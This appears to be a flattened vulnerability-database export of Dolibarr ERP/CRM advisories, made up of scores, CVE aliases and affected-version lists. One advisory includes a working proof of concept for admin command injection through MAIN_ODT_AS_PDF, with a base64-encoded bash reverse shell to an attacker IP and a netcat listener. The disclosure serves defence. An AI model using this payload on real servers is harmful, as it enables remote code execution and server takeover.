CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P |
|
| 2 |
| value |
LOW |
| scoring_system |
generic_textual |
| scoring_elements |
|
|
|
| url |
https://github.com/Dolibarr/dolibarr |
|
| 3 |
|
| 4 |
| reference_url |
https://vuldb.com/submit/801794 |
| reference_id |
|
| reference_type |
|
| scores |
| 0 |
| value |
2.6 |
| scoring_system |
cvssv2 |
| scoring_elements |
AV:N/AC:H/Au:N/C:N/I:P/A:N/E:POC/RL:ND/RC:UR |
|
| 1 |
| value |
3.7 |
| scoring_system |
cvssv3 |
| scoring_elements |
CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N/E:P/RL:X/RC:R |
|
| 2 |
| value |
3.7 |
| scoring_system |
cvssv3.1 |
| scoring_elements |
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N/E:P/RL:X/RC:R |
|
| 3 |
| value |
3.7 |
| scoring_system |
cvssv3.1 |
| scoring_elements |
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N |
|
| 4 |
| value |
2.9 |
| scoring_system |
cvssv4 |
| scoring_elements |
CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P |
|
| 5 |
| value |
6.3 |
| scoring_system |
cvssv4 |
| scoring_elements |
CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P |
|
| 6 |
| value |
LOW |
| scoring_system |
generic_textual |
| scoring_elements |
|
|
| 7 |
| value |
Track |
| scoring_system |
ssvc |
| scoring_elements |
SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-04T13:07:21Z/ |
|
|
| url |
https://vuldb.com/submit/801794 |
|
| 5 |
| reference_url |
https://vuldb.com/vuln/360859 |
| reference_id |
|
| reference_type |
|
| scores |
| 0 |
| value |
2.6 |
| scoring_system |
cvssv2 |
| scoring_elements |
AV:N/AC:H/Au:N/C:N/I:P/A:N/E:POC/RL:ND/RC:UR |
|
| 1 |
| value |
3.7 |
| scoring_system |
cvssv3 |
| scoring_elements |
CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N/E:P/RL:X/RC:R |
|
| 2 |
| value |
3.7 |
| scoring_system |
cvssv3.1 |
| scoring_elements |
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N/E:P/RL:X/RC:R |
|
| 3 |
| value |
3.7 |
| scoring_system |
cvssv3.1 |
| scoring_elements |
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N |
|
| 4 |
| value |
2.9 |
| scoring_system |
cvssv4 |
| scoring_elements |
CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P |
|
| 5 |
| value |
6.3 |
| scoring_system |
cvssv4 |
| scoring_elements |
CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P |
|
| 6 |
| value |
LOW |
| scoring_system |
generic_textual |
| scoring_elements |
|
|
| 7 |
| value |
Track |
| scoring_system |
ssvc |
| scoring_elements |
SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-04T13:07:21Z/ |
|
|
| url |
https://vuldb.com/vuln/360859 |
|
| 6 |
| reference_url |
https://vuldb.com/vuln/360859/cti |
| reference_id |
|
| reference_type |
|
| scores |
| 0 |
| value |
2.6 |
| scoring_system |
cvssv2 |
| scoring_elements |
AV:N/AC:H/Au:N/C:N/I:P/A:N/E:POC/RL:ND/RC:UR |
|
| 1 |
| value |
3.7 |
| scoring_system |
cvssv3 |
| scoring_elements |
CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N/E:P/RL:X/RC:R |
|
| 2 |
| value |
3.7 |
| scoring_system |
cvssv3.1 |
| scoring_elements |
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N/E:P/RL:X/RC:R |
|
| 3 |
| value |
3.7 |
| scoring_system |
cvssv3.1 |
| scoring_elements |
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N |
|
| 4 |
| value |
2.9 |
| scoring_system |
cvssv4 |
| scoring_elements |
CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P |
|
| 5 |
| value |
6.3 |
| scoring_system |
cvssv4 |
| scoring_elements |
CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P |
|
| 6 |
| value |
LOW |
| scoring_system |
generic_textual |
| scoring_elements |
|
|
| 7 |
| value |
Track |
| scoring_system |
ssvc |
| scoring_elements |
SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-04T13:07:21Z/ |
|
|
| url |
https://vuldb.com/vuln/360859/cti |
|
| 7 |
|
|
| fixed_packages |
|
| aliases |
CVE-2026-7689, GHSA-jggh-5rmh-r6h5
|
| risk_score |
2.9 |
| exploitability |
0.5 |
| weighted_severity |
5.7 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-k9nc-tze6-k7bx |
|
| 39 |
| url |
VCID-m9p7-7wnz-7uck |
| vulnerability_id |
VCID-m9p7-7wnz-7uck |
| summary |
Cross-site Scripting
Dolibarr ERP/CRM has an Insufficient Filtering issue that can lead to `user/card.php` XSS. |
| references |
| 0 |
| reference_url |
https://api.first.org/data/v1/epss?cve=CVE-2019-19211 |
| reference_id |
|
| reference_type |
|
| scores |
| 0 |
| value |
0.02101 |
| scoring_system |
epss |
| scoring_elements |
0.8438 |
| published_at |
2026-06-04T12:55:00Z |
|
| 1 |
| value |
0.02101 |
| scoring_system |
epss |
| scoring_elements |
0.844 |
| published_at |
2026-06-07T12:55:00Z |
|
| 2 |
| value |
0.02101 |
| scoring_system |
epss |
| scoring_elements |
0.84407 |
| published_at |
2026-06-06T12:55:00Z |
|
| 3 |
| value |
0.02101 |
| scoring_system |
epss |
| scoring_elements |
0.84404 |
| published_at |
2026-06-05T12:55:00Z |
|
|
| url |
https://api.first.org/data/v1/epss?cve=CVE-2019-19211 |
|
| 1 |
|
| 2 |
|
| 3 |
|
| 4 |
|
|
| fixed_packages |
| 0 |
| url |
pkg:composer/dolibarr/dolibarr@10.0.3 |
| purl |
pkg:composer/dolibarr/dolibarr@10.0.3 |
| is_vulnerable |
true |
| affected_by_vulnerabilities |
| 0 |
| vulnerability |
VCID-1225-a2a6-bkan |
|
| 1 |
| vulnerability |
VCID-1uje-n8xc-y7b7 |
|
| 2 |
| vulnerability |
VCID-3cg6-pnf4-jkc1 |
|
| 3 |
| vulnerability |
VCID-3xdg-az5a-dyft |
|
| 4 |
| vulnerability |
VCID-4c2v-phxx-y3h8 |
|
| 5 |
| vulnerability |
VCID-4j1s-mnar-1bef |
|
| 6 |
| vulnerability |
VCID-62rq-q7na-9kgj |
|
| 7 |
| vulnerability |
VCID-651j-rw3n-kkgu |
|
| 8 |
| vulnerability |
VCID-6drz-jsq4-wyhd |
|
| 9 |
| vulnerability |
VCID-6nme-3afj-qfdp |
|
| 10 |
| vulnerability |
VCID-79xt-u5af-cqey |
|
| 11 |
| vulnerability |
VCID-7ku4-fwqc-33ba |
|
| 12 |
| vulnerability |
VCID-7qjh-teat-tqav |
|
| 13 |
| vulnerability |
VCID-8fjr-6hdm-vqdd |
|
| 14 |
| vulnerability |
VCID-9fes-esxc-s7gw |
|
| 15 |
| vulnerability |
VCID-d4uk-4adf-mba9 |
|
| 16 |
| vulnerability |
VCID-dph7-h5d5-gyct |
|
| 17 |
| vulnerability |
VCID-e39t-gvd4-j7ag |
|
| 18 |
| vulnerability |
VCID-egxz-r3nw-xffm |
|
| 19 |
| vulnerability |
VCID-ewrf-wdsh-kqgs |
|
| 20 |
| vulnerability |
VCID-f122-u34a-kfcm |
|
| 21 |
| vulnerability |
VCID-g3x8-rhqm-fuh2 |
|
| 22 |
| vulnerability |
VCID-hrwp-s15m-ffa1 |
|
| 23 |
| vulnerability |
VCID-htgn-37m4-c7fu |
|
| 24 |
| vulnerability |
VCID-j345-dk2c-yfds |
|
| 25 |
| vulnerability |
VCID-jbkd-su9m-3udy |
|
| 26 |
| vulnerability |
VCID-k9nc-tze6-k7bx |
|
| 27 |
| vulnerability |
VCID-m9p7-7wnz-7uck |
|
| 28 |
| vulnerability |
VCID-mpmz-eh21-nkcm |
|
| 29 |
| vulnerability |
VCID-nnth-kevf-vybz |
|
| 30 |
| vulnerability |
VCID-pejz-pskb-aqbg |
|
| 31 |
| vulnerability |
VCID-pfyf-s4fc-d3a8 |
|
| 32 |
| vulnerability |
VCID-rqux-jkta-4kfj |
|
| 33 |
| vulnerability |
VCID-s3xn-47cy-eucf |
|
| 34 |
| vulnerability |
VCID-srth-2stq-gyaq |
|
| 35 |
| vulnerability |
VCID-tmv2-39y8-f7f1 |
|
| 36 |
| vulnerability |
VCID-tsbf-m4eq-gbgp |
|
| 37 |
| vulnerability |
VCID-v9g8-u2uq-7yff |
|
| 38 |
| vulnerability |
VCID-vp4z-qpc7-uug1 |
|
| 39 |
| vulnerability |
VCID-vwxd-syyk-jueh |
|
| 40 |
| vulnerability |
VCID-w7ww-nq62-e7b1 |
|
| 41 |
| vulnerability |
VCID-yn53-kazm-1ugc |
|
| 42 |
| vulnerability |
VCID-yumf-hmep-eqd6 |
|
| 43 |
| vulnerability |
VCID-yup5-ztvt-cfgp |
|
| 44 |
| vulnerability |
VCID-z1ty-xypd-t3ct |
|
|
| resource_url |
http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@10.0.3 |
|
| 1 |
| url |
pkg:composer/dolibarr/dolibarr@10.0.4 |
| purl |
pkg:composer/dolibarr/dolibarr@10.0.4 |
| is_vulnerable |
true |
| affected_by_vulnerabilities |
| 0 |
| vulnerability |
VCID-1225-a2a6-bkan |
|
| 1 |
| vulnerability |
VCID-1uje-n8xc-y7b7 |
|
| 2 |
| vulnerability |
VCID-3cg6-pnf4-jkc1 |
|
| 3 |
| vulnerability |
VCID-3xdg-az5a-dyft |
|
| 4 |
| vulnerability |
VCID-4c2v-phxx-y3h8 |
|
| 5 |
| vulnerability |
VCID-4j1s-mnar-1bef |
|
| 6 |
| vulnerability |
VCID-62rq-q7na-9kgj |
|
| 7 |
| vulnerability |
VCID-651j-rw3n-kkgu |
|
| 8 |
| vulnerability |
VCID-6drz-jsq4-wyhd |
|
| 9 |
| vulnerability |
VCID-6nme-3afj-qfdp |
|
| 10 |
| vulnerability |
VCID-79xt-u5af-cqey |
|
| 11 |
| vulnerability |
VCID-7ku4-fwqc-33ba |
|
| 12 |
| vulnerability |
VCID-7qjh-teat-tqav |
|
| 13 |
| vulnerability |
VCID-8fjr-6hdm-vqdd |
|
| 14 |
| vulnerability |
VCID-d4uk-4adf-mba9 |
|
| 15 |
| vulnerability |
VCID-dph7-h5d5-gyct |
|
| 16 |
| vulnerability |
VCID-egxz-r3nw-xffm |
|
| 17 |
| vulnerability |
VCID-ewrf-wdsh-kqgs |
|
| 18 |
| vulnerability |
VCID-f122-u34a-kfcm |
|
| 19 |
| vulnerability |
VCID-g3x8-rhqm-fuh2 |
|
| 20 |
| vulnerability |
VCID-hrwp-s15m-ffa1 |
|
| 21 |
| vulnerability |
VCID-htgn-37m4-c7fu |
|
| 22 |
| vulnerability |
VCID-j345-dk2c-yfds |
|
| 23 |
| vulnerability |
VCID-jbkd-su9m-3udy |
|
| 24 |
| vulnerability |
VCID-k9nc-tze6-k7bx |
|
| 25 |
| vulnerability |
VCID-mpmz-eh21-nkcm |
|
| 26 |
| vulnerability |
VCID-nnth-kevf-vybz |
|
| 27 |
| vulnerability |
VCID-pejz-pskb-aqbg |
|
| 28 |
| vulnerability |
VCID-pfyf-s4fc-d3a8 |
|
| 29 |
| vulnerability |
VCID-rqux-jkta-4kfj |
|
| 30 |
| vulnerability |
VCID-s3xn-47cy-eucf |
|
| 31 |
| vulnerability |
VCID-srth-2stq-gyaq |
|
| 32 |
| vulnerability |
VCID-tmv2-39y8-f7f1 |
|
| 33 |
| vulnerability |
VCID-tsbf-m4eq-gbgp |
|
| 34 |
| vulnerability |
VCID-v9g8-u2uq-7yff |
|
| 35 |
| vulnerability |
VCID-vp4z-qpc7-uug1 |
|
| 36 |
| vulnerability |
VCID-vwxd-syyk-jueh |
|
| 37 |
| vulnerability |
VCID-w7ww-nq62-e7b1 |
|
| 38 |
| vulnerability |
VCID-yn53-kazm-1ugc |
|
| 39 |
| vulnerability |
VCID-yumf-hmep-eqd6 |
|
| 40 |
| vulnerability |
VCID-yup5-ztvt-cfgp |
|
| 41 |
| vulnerability |
VCID-z1ty-xypd-t3ct |
|
|
| resource_url |
http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@10.0.4 |
|
|
| aliases |
CVE-2019-19211, GHSA-gfhf-2xr5-2fvw
|
| risk_score |
3.1 |
| exploitability |
0.5 |
| weighted_severity |
6.2 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-m9p7-7wnz-7uck |
|
| 40 |
| url |
VCID-mpmz-eh21-nkcm |
| vulnerability_id |
VCID-mpmz-eh21-nkcm |
| summary |
Dolibarr: OS Command Injection (RCE) via MAIN_ODT_AS_PDF configuration
### Summary
An authenticated administrator can execute arbitrary operating system commands by injecting a malicious payload into the `MAIN_ODT_AS_PDF` configuration constant. This vulnerability exists because the application fails to properly validate or escape the command path before passing it to the `exec()` function in the ODT to PDF conversion process.
### Details
The vulnerability is located in `htdocs/includes/odtphp/odf.php`.
When the system tries to convert an ODT document to PDF (e.g., in Proposals, Invoices), it constructs a shell command using the `MAIN_ODT_AS_PDF` global setting.
Code snippet (`htdocs/includes/odtphp/odf.php`, approx line 930):
```php
$command = getDolGlobalString('MAIN_ODT_AS_PDF').' '.escapeshellcmd($name);
// ...
exec($command, $output_arr, $retval);
```
While the filename `$name` is sanitized using `escapeshellcmd()`, the configuration variable `MAIN_ODT_AS_PDF` is retrieved directly from the database and concatenated at the beginning of the string. An attacker with administrative privileges can set this variable to include a command separator (like `;`) followed by arbitrary commands.
### PoC
**Prerequisites:**
1. Login as an Administrator.
2. Ensure the "Commercial Proposals" module is enabled and "ODT templates" are activated in its setup.
**Steps to reproduce (Reverse Shell):**
1. Start a netcat listener on the attacker's machine (IP: `172.26.0.1`, Port: `4445`):
```bash
nc -lvnp 4445
```
2. Prepare the payload. To avoid issues with special characters (like `&` or `>`) being escaped by the web application or shell, encode the reverse shell command in Base64:
```bash
# Command: bash -c 'bash -i >& /dev/tcp/172.26.0.1/4445 0>&1'
echo "bash -c 'bash -i >& /dev/tcp/172.26.0.1/4445 0>&1'" | base64
# Output: YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMjYuMC4xLzQ0NDUgMD4mMScK
```
3. Navigate to **Home -> Setup -> Other Setup**.
4. Add or modify the constant `MAIN_ODT_AS_PDF` with the following injection payload:
```bash
jodconverter; echo YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMjYuMC4xLzQ0NDUgMD4mMScK | base64 -d | bash
```
*(Explanation: `jodconverter` satisfies the initial check, `;` acts as a command separator, and the pipeline decodes and executes the Base64 payload).*
<img width="1898" height="696" alt="image" src="https://github.com/user-attachments/assets/12e4aa61-eb9d-4342-bd03-9a1e824b8316" />
5. Navigate to **Commerce -> New proposal**, create a draft, select an ODT template (e.g., `generic_proposal_odt`), and click **Generate**.
<img width="1907" height="668" alt="image" src="https://github.com/user-attachments/assets/d790847e-50c1-47eb-994b-b2596b949242" />
<img width="1858" height="346" alt="image" src="https://github.com/user-attachments/assets/afbeb170-d004-49d6-a395-1b4572fbf2e7" />
<img width="848" height="183" alt="image" src="https://github.com/user-attachments/assets/93fbe6c9-96a8-4d0f-ad0e-4aea69f0fec1" />
6. Check the netcat listener. A connection will be established, granting a shell on the server:
<img width="616" height="193" alt="image" src="https://github.com/user-attachments/assets/e90817da-9bb2-4fe1-8377-be10d8640e37" />
### Impact
**Remote Code Execution (RCE).**
An attacker who gains access to an administrator account (or a malicious administrator) can execute arbitrary commands on the underlying server with the privileges of the web server user (typically `www-data`). This allows for:
- Reading sensitive configuration files (database credentials).
- Modifying application code.
- Full system compromise depending on server configuration (e.g., docker escape, pivoting).
---
### Credits
Reported by Łukasz Rybak |
| references |
| 0 |
|
| 1 |
| reference_url |
https://github.com/Dolibarr/dolibarr |
| reference_id |
|
| reference_type |
|
| scores |
| 0 |
| value |
9.1 |
| scoring_system |
cvssv3.1 |
| scoring_elements |
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H |
|
| 1 |
| value |
9.4 |
| scoring_system |
cvssv4 |
| scoring_elements |
CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H |
|
| 2 |
| value |
CRITICAL |
| scoring_system |
generic_textual |
| scoring_elements |
|
|
|
| url |
https://github.com/Dolibarr/dolibarr |
|
| 2 |
|
| 3 |
|
| 4 |
|
| 5 |
|
|
| fixed_packages |
|
| aliases |
CVE-2026-23500, GHSA-w5j3-8fcr-h87w
|
| risk_score |
4.5 |
| exploitability |
0.5 |
| weighted_severity |
9.0 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-mpmz-eh21-nkcm |
|
| 41 |
| url |
VCID-nc61-xh5g-tugp |
| vulnerability_id |
VCID-nc61-xh5g-tugp |
| summary |
SQL Injection
Dolibarr ERP/CRM is vulnerable to an SQL injection in `user/index.php` (`search_supervisor` and `search_statut` parameters). |
| references |
| 0 |
| reference_url |
https://api.first.org/data/v1/epss?cve=CVE-2017-9435 |
| reference_id |
|
| reference_type |
|
| scores |
| 0 |
| value |
0.00331 |
| scoring_system |
epss |
| scoring_elements |
0.56282 |
| published_at |
2026-06-04T12:55:00Z |
|
| 1 |
| value |
0.00331 |
| scoring_system |
epss |
| scoring_elements |
0.56331 |
| published_at |
2026-06-07T12:55:00Z |
|
| 2 |
| value |
0.00331 |
| scoring_system |
epss |
| scoring_elements |
0.56345 |
| published_at |
2026-06-06T12:55:00Z |
|
| 3 |
| value |
0.00331 |
| scoring_system |
epss |
| scoring_elements |
0.56338 |
| published_at |
2026-06-05T12:55:00Z |
|
|
| url |
https://api.first.org/data/v1/epss?cve=CVE-2017-9435 |
|
| 1 |
|
| 2 |
|
| 3 |
|
|
| fixed_packages |
| 0 |
| url |
pkg:composer/dolibarr/dolibarr@5.0.3 |
| purl |
pkg:composer/dolibarr/dolibarr@5.0.3 |
| is_vulnerable |
true |
| affected_by_vulnerabilities |
| 0 |
| vulnerability |
VCID-11u2-56qq-cye4 |
|
| 1 |
| vulnerability |
VCID-1225-a2a6-bkan |
|
| 2 |
| vulnerability |
VCID-1jh7-xexf-53cw |
|
| 3 |
| vulnerability |
VCID-1uje-n8xc-y7b7 |
|
| 4 |
| vulnerability |
VCID-2wnq-rrff-tbbt |
|
| 5 |
| vulnerability |
VCID-3cg6-pnf4-jkc1 |
|
| 6 |
| vulnerability |
VCID-3dpn-ry9j-rff6 |
|
| 7 |
| vulnerability |
VCID-3ewz-9zgb-efa7 |
|
| 8 |
| vulnerability |
VCID-3xdg-az5a-dyft |
|
| 9 |
| vulnerability |
VCID-4c2v-phxx-y3h8 |
|
| 10 |
| vulnerability |
VCID-4j1s-mnar-1bef |
|
| 11 |
| vulnerability |
VCID-62rq-q7na-9kgj |
|
| 12 |
| vulnerability |
VCID-651j-rw3n-kkgu |
|
| 13 |
| vulnerability |
VCID-6drz-jsq4-wyhd |
|
| 14 |
| vulnerability |
VCID-6nme-3afj-qfdp |
|
| 15 |
| vulnerability |
VCID-6ten-mcds-gbd7 |
|
| 16 |
| vulnerability |
VCID-79xt-u5af-cqey |
|
| 17 |
| vulnerability |
VCID-7ku4-fwqc-33ba |
|
| 18 |
| vulnerability |
VCID-7kz1-s7qf-aqan |
|
| 19 |
| vulnerability |
VCID-7qjh-teat-tqav |
|
| 20 |
| vulnerability |
VCID-7txt-x88q-2bej |
|
| 21 |
| vulnerability |
VCID-8fjr-6hdm-vqdd |
|
| 22 |
| vulnerability |
VCID-9xkp-4t9p-eqbb |
|
| 23 |
| vulnerability |
VCID-b65k-vs97-63fj |
|
| 24 |
| vulnerability |
VCID-d4uk-4adf-mba9 |
|
| 25 |
| vulnerability |
VCID-dph7-h5d5-gyct |
|
| 26 |
| vulnerability |
VCID-e39t-gvd4-j7ag |
|
| 27 |
| vulnerability |
VCID-egxz-r3nw-xffm |
|
| 28 |
| vulnerability |
VCID-ehb1-ac3n-p7fv |
|
| 29 |
| vulnerability |
VCID-ewrf-wdsh-kqgs |
|
| 30 |
| vulnerability |
VCID-f122-u34a-kfcm |
|
| 31 |
| vulnerability |
VCID-fa52-4y55-37br |
|
| 32 |
| vulnerability |
VCID-g3x8-rhqm-fuh2 |
|
| 33 |
| vulnerability |
VCID-hrwp-s15m-ffa1 |
|
| 34 |
| vulnerability |
VCID-htgn-37m4-c7fu |
|
| 35 |
| vulnerability |
VCID-j345-dk2c-yfds |
|
| 36 |
| vulnerability |
VCID-jbkd-su9m-3udy |
|
| 37 |
| vulnerability |
VCID-jy5f-3h8w-qqff |
|
| 38 |
| vulnerability |
VCID-k9nc-tze6-k7bx |
|
| 39 |
| vulnerability |
VCID-m9p7-7wnz-7uck |
|
| 40 |
| vulnerability |
VCID-mpmz-eh21-nkcm |
|
| 41 |
| vulnerability |
VCID-nmjf-yxwc-m7hj |
|
| 42 |
| vulnerability |
VCID-nnth-kevf-vybz |
|
| 43 |
| vulnerability |
VCID-pejz-pskb-aqbg |
|
| 44 |
| vulnerability |
VCID-pfyf-s4fc-d3a8 |
|
| 45 |
| vulnerability |
VCID-qrcg-mnfa-k7gv |
|
| 46 |
| vulnerability |
VCID-rqux-jkta-4kfj |
|
| 47 |
| vulnerability |
VCID-s3d1-hcmh-fucu |
|
| 48 |
| vulnerability |
VCID-s3xn-47cy-eucf |
|
| 49 |
| vulnerability |
VCID-srth-2stq-gyaq |
|
| 50 |
| vulnerability |
VCID-tmv2-39y8-f7f1 |
|
| 51 |
| vulnerability |
VCID-tsbf-m4eq-gbgp |
|
| 52 |
| vulnerability |
VCID-uzz6-3bze-mbez |
|
| 53 |
| vulnerability |
VCID-v5bc-wjmv-ubhx |
|
| 54 |
| vulnerability |
VCID-v9g8-u2uq-7yff |
|
| 55 |
| vulnerability |
VCID-vp4z-qpc7-uug1 |
|
| 56 |
| vulnerability |
VCID-vwxd-syyk-jueh |
|
| 57 |
| vulnerability |
VCID-w7ww-nq62-e7b1 |
|
| 58 |
| vulnerability |
VCID-yn53-kazm-1ugc |
|
| 59 |
| vulnerability |
VCID-yumf-hmep-eqd6 |
|
| 60 |
| vulnerability |
VCID-yup5-ztvt-cfgp |
|
| 61 |
| vulnerability |
VCID-z1ty-xypd-t3ct |
|
| 62 |
| vulnerability |
VCID-zjqj-1zrx-yqh6 |
|
|
| resource_url |
http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@5.0.3 |
|
|
| aliases |
CVE-2017-9435, GHSA-v3m8-7h3p-6j5m
|
| risk_score |
4.5 |
| exploitability |
0.5 |
| weighted_severity |
9.0 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-nc61-xh5g-tugp |
|
| 42 |
| url |
VCID-nmjf-yxwc-m7hj |
| vulnerability_id |
VCID-nmjf-yxwc-m7hj |
| summary |
Cross-site Scripting
A Cross-site scripting (XSS) vulnerability in Dolibarr allows remote attackers to inject arbitrary web script or HTML via the `foruserlogin` parameter to `adherents/cartes/carte.php.` |
| references |
| 0 |
| reference_url |
https://api.first.org/data/v1/epss?cve=CVE-2018-10095 |
| reference_id |
|
| reference_type |
|
| scores |
| 0 |
| value |
0.475 |
| scoring_system |
epss |
| scoring_elements |
0.97757 |
| published_at |
2026-06-04T12:55:00Z |
|
| 1 |
| value |
0.475 |
| scoring_system |
epss |
| scoring_elements |
0.97763 |
| published_at |
2026-06-07T12:55:00Z |
|
| 2 |
| value |
0.475 |
| scoring_system |
epss |
| scoring_elements |
0.97762 |
| published_at |
2026-06-06T12:55:00Z |
|
| 3 |
| value |
0.475 |
| scoring_system |
epss |
| scoring_elements |
0.9776 |
| published_at |
2026-06-05T12:55:00Z |
|
|
| url |
https://api.first.org/data/v1/epss?cve=CVE-2018-10095 |
|
| 1 |
|
| 2 |
|
| 3 |
|
| 4 |
|
| 5 |
|
| 6 |
|
|
| fixed_packages |
| 0 |
| url |
pkg:composer/dolibarr/dolibarr@7.0.2 |
| purl |
pkg:composer/dolibarr/dolibarr@7.0.2 |
| is_vulnerable |
true |
| affected_by_vulnerabilities |
| 0 |
| vulnerability |
VCID-1225-a2a6-bkan |
|
| 1 |
| vulnerability |
VCID-1jh7-xexf-53cw |
|
| 2 |
| vulnerability |
VCID-1uje-n8xc-y7b7 |
|
| 3 |
| vulnerability |
VCID-2wnq-rrff-tbbt |
|
| 4 |
| vulnerability |
VCID-3cg6-pnf4-jkc1 |
|
| 5 |
| vulnerability |
VCID-3ewz-9zgb-efa7 |
|
| 6 |
| vulnerability |
VCID-3xdg-az5a-dyft |
|
| 7 |
| vulnerability |
VCID-4c2v-phxx-y3h8 |
|
| 8 |
| vulnerability |
VCID-4j1s-mnar-1bef |
|
| 9 |
| vulnerability |
VCID-62rq-q7na-9kgj |
|
| 10 |
| vulnerability |
VCID-651j-rw3n-kkgu |
|
| 11 |
| vulnerability |
VCID-6drz-jsq4-wyhd |
|
| 12 |
| vulnerability |
VCID-6nme-3afj-qfdp |
|
| 13 |
| vulnerability |
VCID-6ten-mcds-gbd7 |
|
| 14 |
| vulnerability |
VCID-79xt-u5af-cqey |
|
| 15 |
| vulnerability |
VCID-7ku4-fwqc-33ba |
|
| 16 |
| vulnerability |
VCID-7kz1-s7qf-aqan |
|
| 17 |
| vulnerability |
VCID-7qjh-teat-tqav |
|
| 18 |
| vulnerability |
VCID-7txt-x88q-2bej |
|
| 19 |
| vulnerability |
VCID-8fjr-6hdm-vqdd |
|
| 20 |
| vulnerability |
VCID-b65k-vs97-63fj |
|
| 21 |
| vulnerability |
VCID-d4uk-4adf-mba9 |
|
| 22 |
| vulnerability |
VCID-dph7-h5d5-gyct |
|
| 23 |
| vulnerability |
VCID-e39t-gvd4-j7ag |
|
| 24 |
| vulnerability |
VCID-egxz-r3nw-xffm |
|
| 25 |
| vulnerability |
VCID-ewrf-wdsh-kqgs |
|
| 26 |
| vulnerability |
VCID-f122-u34a-kfcm |
|
| 27 |
| vulnerability |
VCID-g3x8-rhqm-fuh2 |
|
| 28 |
| vulnerability |
VCID-hrwp-s15m-ffa1 |
|
| 29 |
| vulnerability |
VCID-htgn-37m4-c7fu |
|
| 30 |
| vulnerability |
VCID-j345-dk2c-yfds |
|
| 31 |
| vulnerability |
VCID-jbkd-su9m-3udy |
|
| 32 |
| vulnerability |
VCID-jy5f-3h8w-qqff |
|
| 33 |
| vulnerability |
VCID-k9nc-tze6-k7bx |
|
| 34 |
| vulnerability |
VCID-m9p7-7wnz-7uck |
|
| 35 |
| vulnerability |
VCID-mpmz-eh21-nkcm |
|
| 36 |
| vulnerability |
VCID-nnth-kevf-vybz |
|
| 37 |
| vulnerability |
VCID-pejz-pskb-aqbg |
|
| 38 |
| vulnerability |
VCID-pfyf-s4fc-d3a8 |
|
| 39 |
| vulnerability |
VCID-rqux-jkta-4kfj |
|
| 40 |
| vulnerability |
VCID-s3xn-47cy-eucf |
|
| 41 |
| vulnerability |
VCID-srth-2stq-gyaq |
|
| 42 |
| vulnerability |
VCID-tmv2-39y8-f7f1 |
|
| 43 |
| vulnerability |
VCID-tsbf-m4eq-gbgp |
|
| 44 |
| vulnerability |
VCID-v9g8-u2uq-7yff |
|
| 45 |
| vulnerability |
VCID-vp4z-qpc7-uug1 |
|
| 46 |
| vulnerability |
VCID-vvsw-shzx-ufgv |
|
| 47 |
| vulnerability |
VCID-vwxd-syyk-jueh |
|
| 48 |
| vulnerability |
VCID-w7ww-nq62-e7b1 |
|
| 49 |
| vulnerability |
VCID-yn53-kazm-1ugc |
|
| 50 |
| vulnerability |
VCID-yumf-hmep-eqd6 |
|
| 51 |
| vulnerability |
VCID-yup5-ztvt-cfgp |
|
| 52 |
| vulnerability |
VCID-z1ty-xypd-t3ct |
|
|
| resource_url |
http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@7.0.2 |
|
|
| aliases |
CVE-2018-10095, GHSA-p2fm-8rhj-58fr
|
| risk_score |
3.1 |
| exploitability |
0.5 |
| weighted_severity |
6.2 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-nmjf-yxwc-m7hj |
|
| 43 |
| url |
VCID-nnth-kevf-vybz |
| vulnerability_id |
VCID-nnth-kevf-vybz |
| summary |
Improper Privilege Management
Dolibarr CRM allows privilege escalation. This could allow remote authenticated attackers to upload arbitrary files via `societe/document.php` in which `disabled` is changed to `enabled` in the HTML source code. |
| references |
| 0 |
| reference_url |
https://api.first.org/data/v1/epss?cve=CVE-2020-14201 |
| reference_id |
|
| reference_type |
|
| scores |
| 0 |
| value |
0.00146 |
| scoring_system |
epss |
| scoring_elements |
0.34673 |
| published_at |
2026-06-04T12:55:00Z |
|
| 1 |
| value |
0.00146 |
